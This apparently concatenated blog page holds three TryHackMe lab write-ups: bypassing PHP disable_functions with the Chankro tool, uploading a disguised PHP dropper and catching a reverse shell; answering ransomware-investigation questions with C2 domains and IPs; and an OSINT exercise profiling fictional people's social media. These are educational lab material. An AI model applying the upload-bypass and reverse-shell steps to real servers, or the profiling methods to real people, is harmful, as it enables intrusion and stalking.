Bypass Disable Functions

Practice bypassing disabled dangerous features that run operating system commands or start processes.

This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.

It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.


Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.

One of the easiest techniques to implement and not very widespread is to abuse the mail() and putenv() functionalities. This technique is not new, it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function, we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function of a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.



Chankro: tool to evade disable_functions and open_basedir


Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.

Install tool:

git clone https://github.com/TarlogicSecurity/Chankro.git
cd Chankro
python2 chankro.py --help



python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads.




 

Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

My command run successfully, and I created a file in the directory with the output of the command.

 

First of all we will start machine of tryhackme room bypass disable function and after search room's IP what do we see there!! there is upload page where we can upload a any image and execution file via Burp Suite because we have to upload by bypassing the PHP file. 

and after uploading malicious file we have to check in which directory the file is uploaded? so for this we will use gobuster for find a directory.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.61.162/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
/assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
/cv.php               (Status: 200) [Size: 4153]                                  
Progress: 98580 / 441122 (22.35%) 

if you want to check which port is open in this site then you can do this with NMAP or RUSTSCAN.

  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
[~] Automatically increasing ulimit value to 5000.
Open 10.10.61.162:22
Open 10.10.61.162:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Initiating Ping Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:17
Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:17
Scanning 10.10.61.162 [2 ports]
Discovered open port 22/tcp on 10.10.61.162
Discovered open port 80/tcp on 10.10.61.162
Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
Initiating Service scan at 12:17
Scanning 2 services on 10.10.61.162
Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.61.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 9.83s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 1.21s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Nmap scan report for 10.10.61.162
Host is up, received syn-ack (0.24s latency).
Scanned at 2021-09-16 12:17:30 IST for 18s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
|   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
|   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Ecorp - Jobs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:17
Completed NSE at 12:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
└─$ 
  

We got a file uploaded directory /uploads

when listing the web with the tool wappalyzer you can see that the web has as a programming language PHP

With this in we can see that the file mind phpinfo.php is available, this file gives us information about the server configuration and the settings to interpret a php for example. 

Looking at the information that gives us, phpinfo we can see a section called disable_funtions and in it many critical variables are set, such as:

    exec
    passthru
    shell_exec
    system
    proc_open
    popen
    curl_exec
    curl_multi_exec

 

As we can see that we are very limited when it comes to uploading a file php which contains malicious code for our benefit but investigating and thanks to the information provided by this machine we can make use of the tool Chankro .

This tool allows us to execute commands through the mail () and putenv () functions by changing an environment variable with which it executes the binary sendmail . An explanation of what it does is at a low level explained in this article .

To test if the tool works we are going to execute a whoami and deposit it in the absolute path of the web, which is hosted in /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/ this is known since in phpinfo you can see the path in where the web is hosted.

I will use the tool Chankro with the following paramters but before we create a c.sh file 

sudo nano c.sh

python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

--arch = Architecture of system victim 32 o 64.
--input = file with your payload to execute
--output = Name of the PHP file you are going to create; this is the file you will need to upload.
--path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads. 

┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: c.sh
[+] Architecture: x64
[+] Final PHP: hackingtruth-exploit.php


[+] File created!
┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
└─$     

once the malicious file is created, it creates the file for us, i will php go to the web and upload it.

and file uploading time we intercept the request and changed the content-type (image/jpeg) and write a GIF87a

What is GIF87a?

GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animationcapabilities.

check a file uploaded or not in /uploads directory

Gaining Access 

Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code that when it is executed I will start a revershell to my machine on port 443:


With this in mind and already modified the file command.sh I recreate the file winsad.php with Chankro and once created I add the header 'GIF89a;' and upload the file.

Since I went back up the php and going to the path where is hosted winsad.php I can see that the code interprets me and gives me the shell : 

Start a netcat listener and click on that uploaded file-

nc -nvlp 4444

Once inside the machine we can go to the user's directory s4vi and view the flag.

www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
<ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
www-data@ubuntu:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
www-data@ubuntu:/home$ cd s4vi
cd s4vi
www-data@ubuntu:/home/s4vi$ 
ls -la



www-data@ubuntu:/home/s4vi$ ls -la
total 44
drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
-rw------- 1 root root 6127 Jun 23 23:49 .bash_history
-rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
-rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
-rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
-rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
-rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
-rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
www-data@ubuntu:/home/s4vi$ 



www-data@ubuntu:/home/s4vi$ cat flag.txt
cat cat flag.txt
cat: cat: No such file or directory
thm{bypass_d1sable_functions_1n_php}
www-data@ubuntu:/home/s4vi$ 

We got it!!! 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

Hello guys, This is writeup for the room of tryhackme Dunkle Materie from the TryHackMe platform. This room is a medium room that lets users investigate the ransomware attack using an application called ProcDOT.

 

The firewall alerted the Security Operations Center that one of the machines at the Sales department, which stores all the customers' data, contacted the malicious domains over the network. When the Security Analysts looked closely, the data sent to the domains contained suspicious base64-encoded strings. The Analysts involved the Incident Response team in pulling the Process Monitor and network traffic data to determine if the host is infected. But once they got on the machine, they knew it was a ransomware attack by looking at the wallpaper and reading the ransomware note.

I place the logfile into the procmon as in the figure below.

It doesn't seem to work, so I added the traffic file to Windump.

1) Provide the two PIDs spawned from the malicious executable. (In the order as they appear in the analysis tool)

 

Ans- 8644, 7128

 

2) Provide the full path where the ransomware initially got executed? (Include the full path in your answer)

 

We can see that the red box is the full path where the malware is initially executed, which is the second question.

(The path is redacted for the learning purposes of each user.)

Ans- c:\users\sales\appdata\local\temp\exploreer.exe

3) This ransomware transfers the information about the compromised system and the encryption results to two domains over HTTP POST. What are the two C2 domains? (no space in the answer)

 

 

On the second exploreer.exe, I also found one.

Ans- mojobiden.com,paymenthacks.com

4) What are the IPs of the malicious domains? (no space in the answer)
 

Ans- 146.112.61.108,206.188.197.206





5) Provide the user-agent used to transfer the encrypted data to the C2 channel.

 

For this question, it wanted us to identify the user-agent used to transfer the encrypted data to the C2 channel.

So, by right-clicking the site we found previously, we click on “Follow TCP Stream”.

Ans- Firefox/89.0










6) Provide the cloud security service that blocked the malicious domain.

 

Now, we require to identify the cloud security service that blocked the malicious domain.

So, at the same window, scroll down a bit more. And we can see the server name.

Ans- Cisco Umbrella







7) Provide the name of the bitmap that the ransomware set up as a desktop wallpaper.

 

Ans- ley9kpi9r.bmp







8) Find the PID (Process ID) of the process which attempted to change the background wallpaper on the victim's machine.

 

Ans- 4892







9) The ransomware mounted a drive and assigned it the letter. Provide the registry key path to the mounted drive, including the drive letter.

 

For this part, we need to find the registry key path to the mounted drive, with the drive letter. So, I started with exploreer.exe. I look into each process in detail but failed to find the path.

This really cost me so much time. As I was looking into the registry process and back to exploreer.exe, without realizing that I did not turn off the “no path” option. I wasted like an hour until I realize it. So, after in a rabbit hole for an hour, I manage to find the path.

Ans- HKLM\SYSTEM\MountedDevices\DosDevices\Z:




10) Now you have collected some IOCs from this investigation. Provide the name of the ransomware used in the attack. (external research required)

 

This also takes me a lot of time to research. I do not have an idea on what keyword should I use to search for it.

I tried to search on “ransomware targeting mount drive” and other doesn't help at all. But suddenly I think about the site “hacker” used before. So, I try to use one of the websites and look at it on Google. And BAM! I got it!

Ans- Blackmatter Ransomware

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



  - Hacking Truth by Kumar Atul Jaiswal

In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



Prerequisites:


Critical Thinking.
A love of going deep into rabbit -holes.
Basic understanding of Google.
Python 3.7+

Task 2 Story

Background Information:


You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.  TryHackMe KaffeeSec - SoMeSINT


After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 

Answer the questions below


1) Who hired you?

Ans :- ks{H}


2) Who are you investigating? (ks{firstname lastname})

Ans :- ks{thomas straussman}

Task 3 Let's get started!!

Prerequisites:

Patience, curiosity, and a passion for digging into rabbit holes.
Firefox, Chrome, or another chromium-based browser (I recommend Brave).


How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.


The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.



Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



Answer the questions below


1) What is Thomas' favorite holiday?

Ans :- Christmas

Its mentioned in the bio as X-mas or Christmas

2) What is Thomas' birth date?

Ans :- 12-20-1990

His birthday is evident from the below reddit post.

3) What is Thomas' fiancee's Twitter handle?

Ans :- @fhodgelink



 

Looking at his followers we can find the twitter handle of his finacee.

4) What is Thomas' background picture of?

Ans :- Buddha

Task 4 Spider... what?

Requirements:

    Spiderfoot
    Python 3


First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).

Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

You can access the web interface by navigating to localhost:5001 in your browser.

Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 

Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 

If you find a Twitter account that leads to shadowban.eu, click on the link.

If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.

1) What was the source module used to find these accounts?

Ans :- sfp_accounts    

2) Check the shadowban API. What is the value of "search"?

Ans :- ks{1346173539712380929}

Task 5 Connections, connections..

Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!

At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


There are a few key types of information that we want to find from socials:

Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (For IMINT/GEOMINT purposes).

Clear images of the subject's face (For reverse image searches and possibly finding more accounts/sources of info).

Clear images of the subject in a group of people (Family photos, friend groups, other information that can give context to their relationship with the group).

Personal information in their bio, or other personal data from their profile itself (Where they grew up, currently live, went to school, etc..).

Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation to specific places? All this information can help in an investigation.)


Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

What personal information can you find?

NOTE: If you get stuck on the first flag, consider two things:

• You can reverse image search landscapes / locations and most likely get a result.
• You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.

Answer the questions below


1) Where did Thomas and his fiancee vacation to?

Ans :- Koblenz, Germany

Fiancé’s Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink) Its pretty straightforward as per the below picture. The flag format is City, Country (7 letters, 7 letters)

So,it will be in the format — — — -, Germany.

Doing a reverse search of this image, indicates its Koblenz in Germany.

2) When is Francesca's Mother's birthday? (without the year)

Ans :- Decemeber 25th

We can see the Above tweet

3) What is the name of their cat?

Ans :- Gotank

https://twitter.com/FHodgelink/status/1343023195855736837

4) What show does Francesca like to watch?

Ans :- 90 Day Fiancee

One of the tweets is the below one which shares the name of the program

Task 6 Turn back the clock!!

Now that we've gathered intel from Thomas and Francesca's Twitters, lets move to another platform - Reddit.


For the sake of this investigation, we're going to be using Reddit in two different ways:

Use the old version (http://old.reddit.com/) for wayback machine purposes

Use the new version (https://www.reddit.com/) for other purposes (later on)


First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


    Get it for Firefox
    Get it for Chrome
   

Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


So it hasn't been saved yet... Nothing out of the ordinary, right?

Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?


Answer the questions below


1) What is the name of Thomas' coworker?

Ans :- Hans Minik

I got stuck at this stage. Finally did a waybackmachine to check the snapshot for 21st Dec 2020

2) Where does his coworker live?

Ans :- Nuuk, Greenland

Thomas lives in Nuuk, as per his profile

 Looking into Hans reddit profile, we can find the following posts

3) What is the paste ID for the link we found? (flag format)

Ans :- ks{ww4ju}

Hans profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

4) Password for the next link? (flag format)

Ans :- ks{1qaz2wsx}

5) What is the name of Thomas' mistress?

Ans :- Emilia Moller

Paste the password obtained in above step to the url and the name will be shown.

6) What is Thomas' Email address?

Ans :- straussmanthom@mail.com

Disclaimer